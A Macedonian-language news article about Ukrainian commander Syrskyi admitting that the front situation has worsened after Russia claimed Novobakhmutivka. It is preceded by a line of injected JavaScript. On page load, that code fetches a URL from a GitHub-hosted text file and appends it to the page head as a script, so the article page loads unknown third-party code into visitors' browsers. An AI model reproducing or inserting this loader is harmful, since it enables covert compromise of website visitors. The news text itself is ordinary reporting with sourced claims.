;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Украинците признаа дека состојбата на фронтот е влошена - Антропол
АктуелноЛокалноНастани

Украинците признаа дека состојбата на фронтот е влошена

Врховниот командант на вооружените сили на Украина, Олександр Сирски изјави денеска, откако Москва објави дека ја презела контролата врз селото Новобахмутовка во областа Доњецк, дека ситуацијата на теренот се влошила и дека неговите војници заземаат нови позиции на најмалку три линии на фронтот.

Тој на својот канал на Телеграм изјавил дека руските сили активно напаѓаат по целата линија на фронтот и дека украинските единици се префрлиле на нови линии западно од Бердичи, Семеновка и Новомихајловка.

Тој додал дека руската страна со четири бригади се обидува да развие офанзива западно од Авдејевка и Маринка, пробивајќи се до Покровск и Курахово, пренесува „Униан“.

Сирски навел дека има „динамична промена во ситуацијата“ и дека поединечните позиции се менуваат „од рака на рака“ неколку пати во текот на денот, што доведува до „двосмислено разбирање на ситуацијата“.

Претходно денеска руското Министерство за одбрана соопшти дека руската армија ја презела контролата врз селото Новобахмутовка во самопрогласената Доњецка народна република, што била клучна точка во борбите во последните денови.

Како што наведува РИА Новости, Новобахмутовка се наоѓа северозападно од Авдеевка, на истокот на Украина, а преземањето контрола врз тоа село отвора можност руските сили да ги опколат украинските сили кои го бранат селото Бердичи.